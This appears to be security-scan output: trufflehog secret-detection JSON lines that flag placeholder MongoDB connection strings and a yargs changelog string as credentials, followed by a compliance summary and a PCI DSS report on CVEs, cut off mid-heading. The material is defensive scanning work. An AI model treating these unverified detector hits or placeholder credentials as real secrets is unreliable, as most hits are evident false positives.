+{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScripta0b61ac21e2b554aa73dbf1a66d4a7af94047c2f","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript222c8fef2e2ad46e314c337dec96940f896bec35","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript99011ab5ba90232506ece0a17e59e2001a1ab562","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptfe380cd356aa33aef0449facd59c22cab8930ac9","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript463feb2870158eb9df670222b0f0a40a05cf18d0","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript0891d0ed35b30c83a6d9e9f6a5c5f84d13c546a0","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptbb0f2eb996fa4e19d330b31a01c2036cafa99a7e","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript63b3dd31a455d428902220c1992ae930e18aff5c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptf9a18bfd624a5013108084f690cd8a1de794c430","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript99c2dc850e67c606644f8b0c0bca1a59c87dcbcd","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript6a9ebe2d955e3e979e76c07ffbb1c17fef64cb49","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptc10c38cca04298f96b55a7e374a9a134abefffa7","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript1840ba22f1a24c0ece8e32bbd31db4134a080aee","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptb1b156a3eb4ddd6803fbbd56c611a77919293000","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript12c82e62663e928148a7ee2f51629aa26a0f9bb2","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptebee59d9022da538410e69a5c025019ed46d13d2","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptafd5b4871bfeb90d58351ac56c5c44a83ef033e6","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript2ba8ce05e8fefbeffc6cb7488d9ebf6e86cceb1d","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript0d3642b6f829b637938774c0c6ce5f6bfe1afa51","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript225ab8271938bed3a48d23175f3d580ce8cd1306","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript932cd1177e93f5cc99edfe57a4028e30717bf8fb","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript089417550ef5a5b8ce3578dd2a989191300b64cd","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript69f29a9cd429d4bb99481238305390107ac75b02","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScripte60b39b9d3a912c06db43f87c86ba894142b6c1c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript34949f89ee7cdf88f7b315659df4b5f62f714842","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript63810ca1ae1a24b08293a4d971e70e058c7a41e2","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript3af7f04cdbfcbd4b3f432aca5144d43f21958c39","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript6014e39bca3a1e8445aa0fb2a435f6181e344c45","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":644}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":646}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/defaultauthdb","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":647}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/defaultauthdb?authSource=admin","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":649}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/defaultauthdb?authSource=admin\u0026connectTimeoutMS=300000","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":651}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/?authSource=admin","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":652}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/?authSource=admin\u0026connectTimeoutMS=300000","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":651}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/?authSource=admin","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":652}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/?authSource=admin\u0026connectTimeoutMS=300000","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts","line":649}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://username:password@host:1234/defaultauthdb?authSource=admin\u0026connectTimeoutMS=300000","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} diff --git a/results/summaries/COMPLIANCE_SUMMARY.md b/results/summaries/COMPLIANCE_SUMMARY.md new file mode 100644 index 0000000..be369e5 --- /dev/null +++ b/results/summaries/COMPLIANCE_SUMMARY.md @@ -0,0 +1,67 @@ +# Compliance Framework Summary + +**Total Findings:** 712 +**Findings with Compliance Mappings:** 712 (100.0%) + +## Framework Coverage + +| Framework | Coverage | +|-----------|----------| +| **OWASP Top 10 2021** | 4/10 categories | +| **CWE Top 25 2024** | 6/25 weaknesses | +| **CIS Controls v8.1** | 7 controls | +| **NIST CSF 2.0** | 1427 mappings across 4 functions | +| **PCI DSS 4.0** | 5 requirements | +| **MITRE ATT&CK** | 4 techniques | + +## OWASP Top 10 2021 + +| Category | Findings | +|----------|----------| +| A01:2021 | 4 | +| A02:2021 | 42 | +| A03:2021 | 6 | +| A10:2021 | 2 | + +## CWE Top 25 2024 (Top 10 Most Frequent) + +| CWE ID | Rank | Findings | +|--------|------|----------| +| CWE-798 | 18 | 41 | +| CWE-863 | 24 | 3 | +| CWE-79 | 1 | 3 | +| CWE-918 | 19 | 2 | +| CWE-20 | 4 | 1 | +| CWE-362 | 21 | 1 | + +## NIST Cybersecurity Framework 2.0 + +| Function | Findings | +|----------|----------| +| GOVERN | 671 | +| IDENTIFY | 671 | +| PROTECT | 82 | +| DETECT | 3 | + +## PCI DSS 4.0 + +**Requirements with Findings:** 5 + +See `PCI_DSS_COMPLIANCE.md` for detailed PCI DSS compliance report. + +## MITRE ATT&CK + +**Techniques Detected:** 4 + +See `attack-navigator.json` for interactive ATT&CK Navigator visualization. + +**Top 5 Techniques:** + +1. **T1195** - Supply Chain Compromise (671 findings) +2. **T1552** - Unsecured Credentials (41 findings) +3. **T1078** - Valid Accounts (41 findings) +4. **T1190** - Exploit Public-Facing Application (3 findings) + +--- + +*Generated by JMo Security Audit Tool Suite* diff --git a/results/summaries/PCI_DSS_COMPLIANCE.md b/results/summaries/PCI_DSS_COMPLIANCE.md new file mode 100644 index 0000000..7f3d372 --- /dev/null +++ b/results/summaries/PCI_DSS_COMPLIANCE.md @@ -0,0 +1,174 @@ +# PCI DSS 4.0 Compliance Report + +**Total Findings:** 712 +**Requirements Affected:** 5 + +## Executive Summary + +| Severity | Count | +|----------|-------| +| **CRITICAL** | 1 | +| **HIGH** | 21 | +| **MEDIUM** | 59 | +| **LOW** | 9 | + +## Findings by PCI DSS Requirement + +### Requirement 6.2.4: Prevent XSS attacks in bespoke software + +**Priority:** CRITICAL +**Findings:** 3 + +- **MEDIUM**: 3 findings + +**Top Findings:** + +1. **[MEDIUM]** `CVE-2026-44580` - Next.js has cross-site scripting in beforeInteractive scripts with untrusted input + - Location: `package-lock.json:0` + +2. **[MEDIUM]** `CVE-2026-44581` - Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces + - Location: `package-lock.json:0` + +3. **[MEDIUM]** `CVE-2026-41305` - postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags + - Location: `package-lock.json:0` + +--- + +### Requirement 6.3.3: Security vulnerabilities are identified and managed + +**Priority:** CRITICAL +**Findings:** 671 + +- **CRITICAL**: 1 findings +- **HIGH**: 21 findings +- **MEDIUM**: 18 findings + +**Top Findings:** + +1. **[LOW]** `CVE-2026-3449` - @tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with A + - Location: `package-lock.json:0` + +2. **[HIGH]** `CVE-2026-44665` - fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content + - Location: `package-lock.json:0` + +3. **[MEDIUM]** `CVE-2026-44664` - fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XM + - Location: `package-lock.json:0` + +4. **[HIGH]** `CVE-2025-47935` - Multer vulnerable to Denial of Service via memory leaks from unclosed streams + - Location: `package-lock.json:0` + +5. **[HIGH]** `CVE-2025-47944` - Multer vulnerable to Denial of Service from maliciously crafted requests + - Location: `package-lock.json:0` + +--- + +### Requirement 